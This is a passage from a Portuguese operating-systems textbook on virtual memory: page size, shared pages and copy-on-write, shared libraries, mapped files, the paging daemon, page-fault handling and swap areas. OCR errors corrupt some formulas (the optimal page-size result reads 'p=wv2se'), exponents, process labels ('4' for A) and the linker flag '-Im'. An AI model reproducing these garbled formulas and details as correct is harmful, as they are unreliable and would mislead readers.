carregada (pelo sistema operacional) em registradores 
de hardware toda vez que a CPU trocar de um processo 
para outro. Nessas máquinas, ter um tamanho de página 
pequeno significa que o tempo exigido para carregar os 
registradores de página fica mais longo à medida que 
o tamanho da página fica menor. Além disso, o espaço 
ocupado pela tabela de páginas aumenta à medida que o 
tamanho da página diminui. 

Esse último ponto pode ser analisado matematica- 
mente. Seja de s bytes o tamanho médio do processo 
e de p bytes o tamanho de página. Além disso, presu- 
ma que cada entrada de página exija e bytes. O número 
aproximado de páginas necessário por processo é então 


de s/p, ocupando se/p bytes de espaço de tabela de pá- 
gina. A memória desperdiçada na última página do pro- 
cesso por causa da fragmentação interna é p/2. Desse 
modo, o custo adicional total decorrente da tabela de 
páginas e da perda pela fragmentação interna é dado 
pela soma desses dois termos: 


custo adicional = se / p + p/2 


O primeiro termo (tamanho da tabela de páginas) é 
grande quando o tamanho da página é pequeno. O se- 
gundo termo (fragmentação interna) é grande quando 
o tamanho da página é grande. O valor ótimo precisa 
encontrar-se em algum ponto intermediário. Calculando 
a derivada primeira com relação a p e equacionando-a a 
zero, chegamos à equação 


—se/p’?+ 1/2=0 


A partir dessa equação podemos derivar uma fór- 
mula que dá o tamanho de página ótimo (considerando 
apenas a memória desperdiçada na fragmentação e o ta- 
manho da tabela de páginas). O resultado é: 


p=wv2se 


Para s = 1 MB e e = 8 bytes por entrada da tabela de 
paginas, o tamanho ótimo de página é 4 KB. Computado- 
res disponíveis comercialmente têm usado tamanhos de 
páginas que variam de 512 bytes a 64 KB. Um valor típi- 
co costumava ser 1 KB, mas hoje 4 KB é mais comum. 


3.5.4 Espaços separados de instruções e dados 


A maioria dos computadores tem um único espaço 
de endereçamento tanto para programas quanto para da- 
dos, como mostrado na Figura 3.24(a). Se esse espaço 
de endereçamento for grande o suficiente, tudo mais 
funcionará bem. No entanto, se for pequeno demais, ele 
força os programadores a encontrar uma saída para fa- 
zer caber tudo no espaço de endereçamento. 
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Uma solução, apresentada pioneiramente no PDP- 
-11 (16 bits), é ter dois espaços de endereçamento di- 
ferentes para instruções (código do programa) e dados, 
chamados de espaço I e espaço D, respectivamente, 
como ilustrado na Figura 3.24(b). Cada espaço de en- 
dereçamento se situa entre O e um valor máximo, em 
geral 2'°— 1 ou 2” — 1. O ligador (linker) precisa saber 
quando endereços I e D separados estão sendo usa- 
dos, pois quando eles estão, os dados são realocados 
para o endereço virtual 0, em vez de começarem após 
o programa. 

Em um computador com esse tipo de projeto, am- 
bos os espaços de endereçamento podem ser paginados, 
independentemente um do outro. Cada um tem sua pró- 
pria tabela de páginas, com seu próprio mapeamento de 
páginas virtuais para quadros de página física. Quan- 
do o hardware quer buscar uma instrução, ele sabe que 
deve usar o espaço I e a tabela de paginas do espaço I. 
De modo similar, dados precisam passar pela tabela de 
páginas do espaço D. Fora essa distinção, ter espaços de 
I e D separados não apresenta quaisquer complicações 
especiais para o sistema operacional e duplica o espaço 
de endereçamento disponível. 

Embora os espaços de endereçamento sejam gran- 
des, seu tamanho costumava ser um problema sério. 
Mesmo hoje, no entanto, espaços de I e D separados 
são comuns. No entanto, em vez de serem usados para 
os espaços de endereçamento normais, eles são usados 
agora para dividir a cache L1. Afinal de contas, na ca- 
che L1, a memória ainda é bastante escassa. 


3.5.5 Páginas compartilhadas 


Outra questão de projeto importante é o comparti- 
lhamento. Em um grande sistema de multiprograma- 
ção, é comum que vários usuários estejam executando 
o mesmo programa ao mesmo tempo. Mesmo um único 
usuário pode estar executando vários programas que 
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usam a mesma biblioteca. E claramente mais eficiente 
compartilhar as paginas, para evitar ter duas cópias da 
mesma página na memória ao mesmo tempo. Um pro- 
blema é que nem todas as páginas são compartilháveis. 
Em particular, as que são somente de leitura, como um 
código de programa, podem sê-lo, mas o compartilha- 
mento de páginas com dados é mais complicado. 

Se o sistema der suporte aos espaços I e D, o com- 
partilhamento de programas é algo relativamente direto, 
fazendo que dois ou mais processos usem a mesma ta- 
bela de páginas para seu espaço I, mas diferentes tabelas 
de páginas para seus espaços D. Tipicamente, em uma 
implementação que dá suporte ao compartilhamento 
dessa forma, as tabelas de páginas são estruturas de da- 
dos independentes da tabela de processos. Cada proces- 
so tem então dois ponteiros em sua tabela: um para a 
tabela de páginas do espaço I e outro para a de páginas 
do espaço D, como mostrado na Figura 3.25. Quando 
o escalonador escolhe um processo para ser executado, 
ele usa esses ponteiros para localizar as tabelas de pági- 
nas apropriadas e ativa a MMU usando-as. Mesmo sem 
espaços I e D separados, os processos podem comparti- 
lhar programas (ou, às vezes, bibliotecas), mas o meca- 
nismo é mais complicado. 

Quando dois ou mais processos compartilham algum 
código, um problema ocorre com as páginas comparti- 
lhadas. Suponha que os processos 4 e B estejam ambos 
executando o editor e compartilhando suas páginas. Se 
o escalonador decidir remover 4 da memória, removen- 
do todas as suas páginas e preenchendo os quadros das 
páginas vazias com algum outro programa, isso fará 
que B gere um grande número de faltas de páginas para 
trazê-las de volta outra vez. 
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De modo semelhante, quando 4 termina a sua exe- 
cução, é essencial que o sistema operacional saiba que 
as páginas ainda estão em uso e, então, seu espaço de 
disco não será liberado por acidente. Pesquisar todas 
as tabelas de páginas para ver se uma página está sen- 
do compartilhada normalmente é muito caro, portanto 
estruturas de dados especiais são necessárias para con- 
trolar as páginas compartilhadas, em especial se a uni- 
dade de compartilhamento for a página individual (ou 
conjunto de páginas), em vez de uma tabela de páginas 
inteira. 

Compartilhar dados é mais complicado do que com- 
partilhar códigos, mas não é impossível. Em particular, 
em UNIX, após uma chamada de sistema fork, o proces- 
so pai e o processo filho são solicitados a compartilhar 
tanto o código do programa quanto os dados. Em um 
sistema de paginação, o que é feito muitas vezes é dar a 
cada um desses processos sua própria tabela de páginas 
e fazer que ambos apontem para o mesmo conjunto de 
dados. Assim, nenhuma cópia de páginas é realizada no 
instante fork. No entanto, todas as páginas de dados são 
mapeadas em ambos os processos como SOMENTE 
PARA LEITURA (read-only). 

Enquanto ambos os processos apenas lerem os seus 
dados, sem modificá-los, essa situação pode continuar. 
Tão logo qualquer um dos processos atualize uma pa- 
lavra da memória, a violação da proteção somente para 
leitura causa uma interrupção no sistema operacional. 
Uma cópia dessa página então é feita e assim cada pro- 
cesso tem agora sua própria cópia particular. Ambas 
as cópias estão agora configuradas para LER/ESCRE- 
VER, portanto operações de escrita subsequentes para 
qualquer uma delas procedem sem interrupções. Essa 
estratégia significa que aquelas páginas que jamais são 
modificadas (incluindo todas as páginas do programa) 
não precisam ser copiadas. Apenas as páginas de dados 
que são realmente modificadas precisam ser copiadas. 
Essa abordagem, chamada de copiar na escrita (copy 
on write), melhora o desempenho ao reduzir o número 
de cópias. 


3.5.6 Bibliotecas compartilhadas 


O compartilhamento pode ser feito em outras 
granularidades além das páginas individuais. Se um 
programa for inicializado duas vezes, a maioria dos 
sistemas operacionais vai compartilhar automatica- 
mente todas as páginas de texto de maneira que ape- 
nas uma cópia esteja na memória. Páginas de texto são 
sempre de leitura somente, portanto não há problema 


aqui. Dependendo do sistema operacional, cada pro- 
cesso pode ficar com sua própria cópia privada das 
páginas de dados, ou elas podem ser compartilhadas 
e marcadas somente de leitura. Se qualquer processo 
modificar uma página de dados, será feita uma cópia 
privada para ele, ou seja, o método copiar na escrita 
(copy on write) será aplicado. 

Nos sistemas modernos, há muitas bibliotecas 
grandes usadas por muitos processos, por exemplo, 
múltiplas bibliotecas gráficas e de E/S. Ligar esta- 
ticamente todas essas bibliotecas a todo programa 
executável no disco as tornaria ainda mais infladas 
do que já são. 

Em vez disso, uma técnica comum é usar bibliote- 
cas compartilhadas (que são chamadas de DLLs ou 
Dynamic Link Libraries — Bibliotecas de Ligação 
Dinâmica — no Windows). Para esclarecer a ideia de 
uma biblioteca compartilhada, primeiro considere a li- 
gação tradicional. Quando um programa é ligado, um 
ou mais arquivos do objeto e possivelmente algumas bi- 
bliotecas são nomeadas no comando para o vinculador, 
como o comando do UNIX 


ld *.o -lc -Im 


que liga todos os arquivos (do objeto) .o no diretório 
atual e então varre duas bibliotecas, /usr/lib/libc.a e 
/usr/lib/libm.a. Quaisquer funções chamadas nos arqui- 
vos de objeto, mas ausentes ali (por exemplo, printf) 
são chamadas de externas indefinidas e buscadas nas 
bibliotecas. Se forem encontradas, elas são incluídas 
no arquivo binário executável. Quaisquer funções que 
elas chamam, mas que ainda não estão presentes tam- 
bém se tornam externas indefinidas. Por exemplo, printf 
precisa de write, então se write ainda não foi incluída, 
o vinculador procurará por ela e a incluirá quando for 
encontrada. Quando o vinculador tiver terminado, um 
arquivo binário é escrito para o disco contendo todas as 
funções necessárias. Funções presentes nas bibliotecas, 
mas não chamadas, não são incluídas. Quando o pro- 
grama é carregado na memória e executado, todas as 
funções de que ele precisa estão ali. 

Agora suponha que programas comuns usem 20-50 
MB em gráficos e funções de interface com o usuá- 
rio. Ligar estaticamente centenas de programas com 
todas essas bibliotecas desperdiçaria uma quantidade 
tremenda de espaço no disco, assim como desperdiça- 
ria espaço em RAM quando eles fossem carregados, 
já que o sistema não teria como saber como ele po- 
deria compartilhá-los. É aí que entram as bibliotecas 
compartilhadas. Quando um programa está ligado a 
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bibliotecas compartilhadas (que são ligeiramente dife- 
rentes das estáticas), em vez de incluir a função efetiva 
chamada, o vinculador inclui uma pequena rotina de 
stub que liga à função chamada no momento da execu- 
ção. Dependendo do sistema e dos detalhes de configu- 
ração, bibliotecas compartilhadas são carregadas seja 
quando o programa é carregado ou quando as funções 
nelas são chamadas pela primeira vez. É claro, se ou- 
tro programa já carregou a biblioteca compartilhada, 
não há necessidade de fazê-lo novamente — esse é o 
ponto da questão. Observe que, quando uma biblioteca 
compartilhada é carregada ou usada, toda a biblioteca 
não é lida na memória de uma única vez. As páginas 
entram uma a uma, na medida do necessário; assim, 
as funções que não são chamadas não serão trazidas 
à RAM. 

Além de tornar arquivos executáveis menores e 
também salvar espaço na memória, bibliotecas com- 
partilhadas têm outra vantagem importante: se uma 
função em uma biblioteca compartilhada for atualiza- 
da para remover um erro, não será necessário recom- 
pilar os programas que a chamam. Os antigos arquivos 
binários continuam a funcionar. Essa característica é 
de especial importância para softwares comerciais, 
em que o código-fonte não é distribuído ao cliente. 
Por exemplo, se a Microsoft encontrar e consertar um 
erro de segurança em algum DLL padrão, o Windows 
Update fará o download do novo DLL e substituirá o 
antigo, e todos os programas que usam o DLL auto- 
maticamente usarão a nova versão da próxima vez que 
forem iniciados. 

Bibliotecas compartilhadas vêm com um pequeno 
problema, no entanto, que tem de ser solucionado, 
como mostra a Figura 3.26. Aqui vemos dois proces- 
sos compartilhando uma biblioteca de 20 KB de ta- 
manho (presumindo que cada caixa tenha 4 KB). No 
entanto, a biblioteca está localizada em endereços di- 
ferentes em cada processo, presumivelmente porque 
os programas em si não são do mesmo tamanho. No 
processo 1, a biblioteca começa no endereço 36K; no 
processo 2, em 12K. Suponha que a primeira coisa 
que a primeira função na biblioteca tem de fazer é 
saltar para o endereço 16 na biblioteca. Se a biblio- 
teca não fosse compartilhada, poderia ser realocada 
dinamicamente quando carregada, então o salto (no 
processo 1) poderia ser para o endereço virtual 36K 
+ 16. Observe que o endereço físico na RAM onde a 
biblioteca está localizada não importa, já que todas 
as páginas são mapeadas de endereços físicos pela 
MMU no hardware. 


160) | SISTEMAS OPERACIONAIS MODERNOS 


[FIGURA 3.26 | Uma biblioteca compartilhada sendo usada por 


dois processos. 
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No entanto, como a biblioteca é compartilhada, a 
realocação durante a execução não funcionará. Afinal, 
quando a primeira função é chamada pelo processo 2 
(no endereço 12K), a instrução de salto tem de ir para 
12K + 16, não 36K + 16. Esse é o pequeno problema. 
Uma maneira de solucioná-lo é usar o método copiar na 
escrita e criar novas páginas para cada processo com- 
partilhando a biblioteca, realocando-as dinamicamente 
quando são criadas, mas esse esquema obviamente frus- 
tra o propósito de compartilhamento da biblioteca. 

Uma solução melhor é compilar bibliotecas compar- 
tilhadas com uma flag de compilador especial dizendo 
ao compilador para não produzir quaisquer instruções 
que usem endereços absolutos. Em vez disso, apenas 
instruções usando endereços relativos são usadas. Por 
exemplo, quase sempre há uma instrução que diz “salte 
para a frente” (ou para trás) n bytes (em oposição a uma 
instrução que dá um endereço específico para saltar). 
Essa instrução funciona corretamente não importa onde 
a biblioteca compartilhada estiver colocada no espaço 
de endereço virtual. Ao evitar endereços absolutos, o 
problema pode ser solucionado. O código que usa ape- 
nas deslocamentos relativos é chamado de código inde- 
pendente do posicionamento. 


3.5.7 Arquivos mapeados 


Bibliotecas compartilhadas são na realidade um caso 
especial de um recurso mais geral chamado arquivos 
mapeados em memória. A ideia aqui é que um proces- 
so pode emitir uma chamada de sistema para mapear 
um arquivo em uma porção do seu espaço virtual. Na 
maioria das implementações, nenhuma página é trazida 
durante o período do mapeamento, mas à medida que as 
páginas são tocadas, elas são paginadas, uma a uma, por 
demanda, usando o arquivo no disco como memória au- 
xiliar. Quando o processo sai, ou explicitamente termina 


o mapeamento do arquivo, todas as páginas modifica- 
das são escritas de volta para o arquivo no disco. 

Arquivos mapeados fornecem um modelo alternati- 
vo para E/S. Em vez de fazer leituras e gravações, o 
arquivo pode ser acessado como um grande arranjo de 
caracteres na memória. Em algumas situações, os pro- 
gramadores consideram esse modelo mais conveniente. 

Se dois ou mais processos mapeiam o mesmo ar- 
quivo ao mesmo tempo, eles podem comunicar-se via 
memória compartilhada. Gravações feitas por um pro- 
cesso a uma memória compartilhada são imediatamente 
visíveis quando o outro lê da parte de seu espaço de en- 
dereçamento virtual mapeado no arquivo. Desse modo, 
esse mecanismo fornece um canal de largura de banda 
elevada entre processos e é muitas vezes usado como tal 
(a ponto de mapear até mesmo um arquivo temporário). 
Agora deve ficar claro que, se arquivos mapeados em 
memória estiverem disponíveis, as bibliotecas podem 
usar esse mecanismo. 


3.5.8 Política de limpeza 


A paginação funciona melhor quando há uma oferta 
abundante de quadros de páginas disponíveis que podem 
ser requisitados quando ocorrerem faltas de páginas. Se 
todos os quadros de páginas estiverem cheios, e, além 
disso, modificados, antes que uma página nova seja tra- 
zida, uma página antiga deve ser primeiro escrita para o 
disco. Para assegurar uma oferta abundante de quadros 
de páginas disponíveis, os sistemas de paginação geral- 
mente têm um processo de segundo plano, chamado de 
daemon de paginação, que dorme a maior parte do tem- 
po, mas é despertado periodicamente para inspecionar 
o estado da memória. Se um número muito pequeno de 
quadros de página estiver disponível, o daemon de pagi- 
nação começa a selecionar as páginas a serem removidas 
usando algum algoritmo de substituição de páginas. Se 
essas páginas tiverem sido modificadas desde que foram 
carregadas, elas serão escritas para o disco. 

De qualquer maneira, o conteúdo anterior da pági- 
na é lembrado. Na eventualidade de uma das páginas 
removidas ser necessária novamente antes de seu qua- 
dro ser sobreposto por uma nova página, ela pode ser 
reobtida retirando-a do conjunto de quadros de páginas 
disponíveis. Manter uma oferta de quadro de páginas 
disponíveis resulta em um melhor desempenho do que 
usar toda a memória e então tentar encontrar um qua- 
dro no momento em que ele for necessário. No mínimo, 
o daemon de paginação assegura que todos os quadros 
disponíveis estejam limpos, assim eles não precisam ser 
escritos às pressas para o disco quando requisitados. 


Uma maneira de implementar essa política de lim- 
peza é com um relógio de dois ponteiros. O ponteiro da 
frente é controlado pelo daemon de paginação. Quando 
ele aponta para uma página suja, ela é reescrita para o 
disco e o ponteiro da frente é avançado. Quando apon- 
ta para uma página limpa, ele simplesmente avança. O 
ponteiro de trás é usado para a substituição de página, 
como no algoritmo de relógio-padrão. Apenas agora, 
a probabilidade do ponteiro de trás apontar para uma 
página limpa é aumentada em virtude do trabalho do 
daemon de paginação. 


3.5.9 Interface de memória virtual 


Até o momento, toda a nossa discussão presumiu 
que a memória virtual é transparente para processos e 
programadores, isto é, tudo o que eles veem é um gran- 
de espaço de endereçamento virtual em um computador 
com uma memória física menor. Com muitos sistemas 
isso é verdade, mas em alguns sistemas avançados, os 
programadores têm algum controle sobre o mapa da 
memória e podem usá-la de maneiras não tradicionais 
para melhorar o comportamento do programa. Nesta se- 
ção, examinaremos brevemente algumas delas. 

Uma razão para dar aos programadores o controle 
sobre o seu mapa de memória é permitir que dois ou 
mais processos compartilhem a mesma memória, às ve- 
zes de maneiras sofisticadas. Se programadores podem 
nomear regiões de sua memória, talvez seja possível 
para um processo dar a outro o nome de uma região 
da memória, e assim aquele processo também possa 
mapeá-la. Com dois (ou mais) processos compartilhan- 
do as mesmas páginas, torna-se possível o compartilha- 
mento de alta largura de banda — um processo escreve 
na memória compartilhada e o outro lê a partir dela. Um 
exemplo sofisticado de um canal de comunicação des- 
ses é descrito por De Bruijn (2011). 

O compartilhamento de páginas também pode ser 
usado para implementar um sistema de transmissão de 
mensagens de alto desempenho. Em geral, quando as 
mensagens são transmitidas, os dados são copiados de 
um espaço de endereçamento para outro, a um custo 
considerável. Se os processos puderem controlar seus 
mapeamentos, uma mensagem pode ser passada com o 
processo emissor retirando o mapeamento das páginas 
contendo a mensagem e o processo receptor fazendo a 
sua inserção. Aqui apenas os nomes das páginas preci- 
sam ser copiados, em vez de todos os dados. 

Outra técnica de gerenciamento de memória avan- 
çada é a memória compartilhada distribuída (FE- 
ELEY et al., 1995; LI, 1986; LI e HUDAK, 1989; 
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ZEKAUSKAS et al., 1994). A ideia aqui é permitir que 
múltiplos processos em uma rede compartilhem um 
conjunto de páginas, possivelmente, mas não neces- 
sariamente, como um único espaço de endereçamento 
linear compartilhado. Quando um processo referencia 
uma página que não está mapeada, ele recebe uma fal- 
ta de página. O tratador da falta de página, que pode 
estar no núcleo ou no espaço do usuário, localiza então 
a máquina contendo a página e lhe envia uma mensa- 
gem pedindo que libere essa página de seu mapeamen- 
to e a envie pela rede. Quando a página chega, ela é 
mapeada e a instrução que causou a falta é reiniciada. 
Examinaremos a memória compartilhada distribuída 
no Capítulo 8. 


3.6 Questões de implementação 


Os implementadores de sistemas de memória virtual 
precisam fazer escolhas entre os principais algoritmos 
teóricos, como o de segunda chance versus envelhe- 
cimento, alocação local versus global e paginação por 
demanda versus pré-paginação. Mas eles também pre- 
cisam estar cientes de uma série de questões de im- 
plementação. Nesta seção examinaremos alguns dos 
problemas comuns e algumas das soluções. 


3.6.1 Envolvimento do sistema operacional com a 
paginação 


Há quatro momentos em que o sistema operacional 
tem de se envolver com a paginação: na criação do pro- 
cesso, na execução do processo, em faltas de páginas 
e no término do processo. Examinaremos agora breve- 
mente cada um deles para ver o que precisa ser feito. 

Quando um novo processo é criado em um sistema 
de paginação, o sistema operacional precisa determinar 
qual o tamanho que o programa e os dados terão (de 
início) e criar uma tabela de páginas para eles. O espaço 
precisa ser alocado na memória para a tabela de páginas 
e deve ser inicializado. A tabela de páginas não precisa 
estar presente na memória quando o processo é levado 
para o disco, mas tem de estar na memória quando ele 
estiver sendo executado. Além disso, o espaço precisa 
ser alocado na área de troca do disco de maneira que, 
quando uma página é enviada, ela tenha algum lugar 
para ir. A área de troca também precisa ser inicializada 
com o código do programa e dados, de maneira que, 
quando o novo processo começar a receber faltas de 
páginas, as páginas possam ser trazidas do disco para 
a memória. Alguns sistemas paginam o programa de 
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texto diretamente do arquivo executável, desse modo 
poupando espaço de disco e tempo de inicialização. 
Por fim, informações a respeito da tabela de páginas e 
área de troca no disco devem ser gravadas na tabela de 
processos. 

Quando um processo é escalonado para execução, 
a MMU tem de ser reinicializada para o novo pro- 
cesso e o TLB descarregado para se livrar de traços 
do processo que estava sendo executado. A tabela 
de páginas do novo processo deve tornar-se a atual, 
normalmente copiando a tabela ou um ponteiro para 
ela em algum(ns) registrador(es) de hardware. Opcio- 
nalmente, algumas ou todas as páginas do processo 
podem ser trazidas para a memória para reduzir o nú- 
mero de faltas de páginas de início (por exemplo, é 
certo que a página apontada pelo contador do progra- 
ma será necessária). 

Quando ocorre uma falta de página, o sistema ope- 
racional precisa ler registradores de hardware para de- 
terminar quais endereços virtuais a causaram. A partir 
dessa informação, ele deve calcular qual página é ne- 
cessária e localizá-la no disco. Ele deve então encontrar 
um quadro de página disponível no qual colocar a pá- 
gina nova, removendo alguma página antiga se neces- 
sário. Depois ele precisa ler a página necessária para 
o quadro de página. Por fim, tem de salvar o contador 
do programa para que ele aponte para a instrução que 
causou a falta de página e deixar que a instrução seja 
executada novamente. 

Quando um processo termina, o sistema operacional 
deve liberar a sua tabela de páginas, suas páginas e o 
espaço de disco que elas ocupam quando estão no dis- 
co. Se algumas das páginas forem compartilhadas com 
outros processos, as páginas na memória e no disco po- 
derão ser liberadas somente quando o último processo 
que as estiver usando for terminado. 


3.6.2 Tratamento de falta de página 


Estamos enfim em uma posição para descrever em 
detalhes o que acontece em uma falta de página. A se- 
quência de eventos é a seguinte: 


1. O hardware gera uma interrupção para o núcleo, 
salvando o contador do programa na pilha. Na 
maioria das máquinas, algumas informações a 
respeito do estado da instrução atual são salvas 
em registradores de CPU especiais. 

2. Uma rotina em código de montagem é ativada 
para salvar os registradores gerais e outras infor- 
mações voláteis, a fim de impedir que o sistema 
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operacional as destrua. Essa rotina chama o siste- 
ma operacional como um procedimento. 

O sistema operacional descobre que uma falta de 
página ocorreu, e tenta descobrir qual página vir- 
tual é necessária. Muitas vezes um dos registra- 
dores do hardware contém essa informação. Do 
contrário, o sistema operacional deve resgatar o 
contador do programa, buscar a instrução e ana- 
lisá-la no software para descobrir qual referência 
gerou essa falta de página. 

Uma vez conhecido o endereço virtual que cau- 
sou a falta, o sistema confere para ver se esse en- 
dereço é válido e a proteção é consistente com 
o acesso. Se não for, é enviado um sinal ao pro- 
cesso ou ele é morto. Se o endereço for válido e 
nenhuma falha de proteção tiver ocorrido, o siste- 
ma confere para ver se um quadro de página está 
disponível. Se nenhum quadro de página estiver 
disponível, o algoritmo de substituição da página 
é executado para selecionar uma vítima. 

Se o quadro de página estiver sujo, a página é 
escalonada para transferência para o disco, e um 
chaveamento de contexto ocorre, suspendendo o 
processo que causou a falta e deixando que outro 
seja executado até que a transferência de disco 
tenha sido completada. De qualquer maneira, o 
quadro é marcado como ocupado para evitar que 
seja usado para outro fim. 

Tão logo o quadro de página esteja limpo (seja 
imediatamente ou após ele ter sido escrito para o 
disco), o sistema operacional buscará o endere- 
ço de disco onde a página desejada se encontra, 
e escalonará uma operação de disco para trazê-la. 
Enquanto a página estiver sendo carregada, o pro- 
cesso que causou a falta ainda está suspenso e ou- 
tro processo do usuário é executado, se disponível. 
Quando a interrupção de disco indica que a pá- 
gina chegou, as tabelas de página são atualizadas 
para refletir a sua posição e o quadro é marcado 
como em um estado normal. 


. À instrução que causou a falta é recuperada para 


o estado que ela tinha quando começou e o con- 
tador do programa é reinicializado para apontar 
para aquela instrução. 

O processo que causou a falta é escalonado, e o 
sistema operacional retorna para a rotina (em lin- 
guagem de máquina) que a chamou. 

Essa rotina recarrega os registradores e outras in- 
formações de estado e retorna para o espaço do 
usuário para continuar a execução, como se ne- 
nhuma falta tivesse ocorrido. 


3.6.3 Backup de instrução 


Quando um programa referencia uma página que não 
está na memória, a instrução que causou a falta é parada 
no meio da sua execução e ocorre uma interrupção para 
o sistema operacional. Após o sistema operacional ter 
buscado a página necessária, ele deve reiniciar a instru- 
ção que causou a interrupção. Isso é mais fácil dizer do 
que fazer. 

Para ver a natureza desse problema em seu pior grau, 
considere uma CPU que tem instruções com dois ende- 
reços, como o Motorola 680x0, amplamente usado em 
sistemas embarcados. A instrução 


MOV.L #6(A1),2(A0) 


é de 6 bytes, por exemplo (ver Figura 3.27). A fim de 
reiniciar a instrução, o sistema operacional precisa de- 
terminar onde está o primeiro byte da instrução. O valor 
do contador do programa no momento da interrupção 
depende de qual operando faltou e como o microcódigo 
da CPU foi implementado. 

Na Figura 3.27, temos uma instrução começando no 
endereço 1000 que faz três referências de memória: a 
palavra de instrução e dois deslocamentos para os ope- 
randos. Dependendo de qual dessas três referências de 
memória causou a falta de página, o contador do progra- 
ma pode ser 1000, 1002 ou 1004 no momento da falta. 
Quase sempre é impossível para o sistema operacional 
determinar de maneira inequívoca onde começou a ins- 
trução. Se o contador do programa for 1002 no momen- 
to da falta, o sistema operacional não tem como dizer se 
a palavra em 1002 é um endereço de memória associado 
com uma instrução em 1000 (por exemplo, o endereço 
de um operando) ou se é o próprio código de operação 
da instrução. 

Por pior que possa ser esse problema ele poderia ser 
mais desastroso ainda. Alguns modos de endereçamen- 
to do 680x0 usam autoincremento, o que significa que 
um efeito colateral da execução da instrução é incre- 
mentar um registrador (ou mais). Instruções que usam o 
autoincremento também podem faltar. Dependendo dos 
detalhes do microcódigo, o incremento pode ser feito 
antes da referência de memória, caso em que o sistema 


KETEFA Uma instrução provocando uma falta de pagina. 
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operacional deve realizar o decremento do registrador 
em software antes e reiniciar a instrução. Ou, o autoin- 
cremento pode ser feito após a referência de memória, 
caso em que ele não terá sido feito no momento da inter- 
rupção e não deve ser desfeito pelo sistema operacional. 
O modo de autodecremento também existe e causa um 
problema similar. Os detalhes precisos sobre se autoin- 
cremento e autodecremento foram ou não feitos antes 
das referências de memória correspondentes podem 
diferir de instrução para instrução e de um modelo de 
CPU para outro. 

Felizmente, em algumas máquinas os projetistas de 
CPUs fornecem uma solução, em geral na forma de um 
registrador interno escondido no qual o contador do 
programa é copiado um pouco antes de cada instrução 
ser executada. Essas máquinas também podem ter um 
segundo registrador dizendo quais registradores já fo- 
ram autoincrementados ou autodecrementados, e por 
quanto. Recebida essa informação, o sistema operacio- 
nal pode desfazer inequivocamente todos os efeitos da 
instrução que causou a falta, de maneira que ele possa 
ser reinicializado. Se essa informação não estiver dispo- 
nível, o sistema operacional precisará se desdobrar para 
descobrir o que aconteceu e como repará-lo. É como se 
os projetistas do hardware não tivessem sido capazes 
de solucionar o problema, então eles desistiram de vez 
e disseram aos projetistas do sistema operacional para 
lidar com a questão. Sujeitos bacanas. 


3.6.4 Retenção de páginas na memória 


Embora não tenhamos discutido muito sobre E/S nes- 
te capítulo, o fato de um computador ter memória virtual 
não significa que não exista E/S. Memória virtual e E/S 
interagem de maneiras sutis. Considere um processo que 
recém-emitiu uma chamada de sistema para ler de algum 
arquivo ou dispositivo para um buffer dentro do seu es- 
paço de endereçamento. Enquanto espera que E/S seja 
concluída, o processo é suspenso e outro processo auto- 
rizado a executar. Esse outro processo causa uma falta 
de página. 

Se o algoritmo de paginação for global, há uma 
chance pequena, mas não zero, de que a página conten- 
do o buffer de E/S será escolhida para ser removida da 
memória. Se um dispositivo de E/S estiver no processo 
de realizar uma transferência via DMA para aquela pá- 
gina, removê-lo fará que parte dos dados seja escrita no 
buffer a que eles pertencem, e parte seja escrita sobre a 
página recém-carregada. Uma solução para esse proble- 
ma é trancar as páginas engajadas em E/S na memória 
de maneira que elas não sejam removidas. Trancar uma 
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página é muitas vezes chamado de fixação (pinning) na 
memória. Outra solução é fazer todas as operações de 
E/S para buffers no núcleo e então copiar os dados para 
as páginas do usuário mais tarde. 


3.6.5 Armazenamento de apoio 


Em nossa discussão dos algoritmos de substituição 
de página, vimos como uma página é selecionada para 
remoção. Não dissemos muito a respeito de onde no dis- 
co ela é colocada quando descartada. Vamos descrever 
agora algumas das questões relacionadas com o geren- 
ciamento de disco. 

O algoritmo mais simples para alocação de espaço 
em disco consiste na criação de uma área de troca es- 
pecial no disco ou, até melhor, em um disco separado 
do sistema de arquivos (para equilibrar a carga de E/S). 
A maioria dos sistemas UNIX trabalha assim. Essa par- 
tição não tem um sistema de arquivos normal nela, o 
que elimina os custos extras de conversão dos desloca- 
mentos em arquivos para bloquear endereços. Em vez 
disso, são usados números de bloco relativos ao início 
da partição em todo o processo. 

Quando o sistema operacional é inicializado, essa 
área de troca está vazia e é representada na memória 
como uma única entrada contendo sua origem e tama- 
nho. No esquema mais simples, quando o primeiro pro- 
cesso é inicializado, uma parte dessa área do tamanho 
do primeiro processo é reservada e a área restante re- 
duzida por esse montante. À medida que novos proces- 
sos são inicializados, eles recebem porções da área de 
troca iguais em tamanho às de suas imagens de núcleo. 
Quando eles terminam, seu espaço de disco é liberado. 
A área de troca é gerenciada como uma lista de pedaços 


disponíveis. Algoritmos melhores serão discutidos no 
Capítulo 10. 

Associado com cada processo está o endereço de 
disco da sua área de troca, isto é, onde na área de tro- 
ca sua imagem é mantida. Essa informação é mantida 
na tabela de processos. O cálculo do endereço para es- 
crever uma página torna-se simples: apenas adicione o 
deslocamento da página dentro do espaço de endereço 
virtual para o início da área de troca. No entanto, antes 
que um processo possa ser iniciado, a área de troca pre- 
cisa ser inicializada. Uma maneira de fazer isso é copiar 
a imagem de processo inteira para a área de troca, de 
maneira que ela possa ser carregada na medida em que 
for necessária. A outra maneira é carregar o processo 
inteiro na memória e deixá-lo ser removido para o disco 
quando necessário. 

No entanto, esse modelo simples tem um problema: 
processos podem aumentar em tamanho após serem ini- 
ciados. Embora o programa de texto seja normalmente 
fixo, a área de dados pode às vezes crescer, e a pilha 
pode sempre crescer. Em consequência, pode ser melhor 
reservar áreas de troca separadas para o texto, dados e 
pilha e permitir que cada uma dessas áreas consista de 
mais do que um pedaço do disco. 

O outro extremo é não alocar nada antecipadamente 
e alocar espaço de disco para cada página quando ela for 
removida e liberar o mesmo espaço quando ela for car- 
regada na memória. Dessa maneira, os processos na me- 
mória não ficam amarrados a qualquer espaço de troca. 
A desvantagem é que um endereço de disco é necessário 
na memória para controlar cada página no disco. Em 
outras palavras, é preciso haver uma tabela por proces- 
so dizendo para cada página no disco onde ela está. As 
duas alternativas são mostradas na Figura 3.28. 


lei] es) (a) Paginação para uma área de troca estática. (b) Armazenando páginas dinamicamente. 
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Na Figura 3.28(a), é mostrada uma tabela de páginas 
com oito páginas. As páginas 0, 3, 4 e 6 estão na me- 
mória principal. As páginas 1, 2, 5 e 7 estão no disco. 
A área de troca no disco é tão grande quanto o espa- 
ço de endereço virtual do processo (oito páginas), com 
cada página tendo uma localização fixa para a qual ela 
é escrita quando removida da memória principal. Cal- 
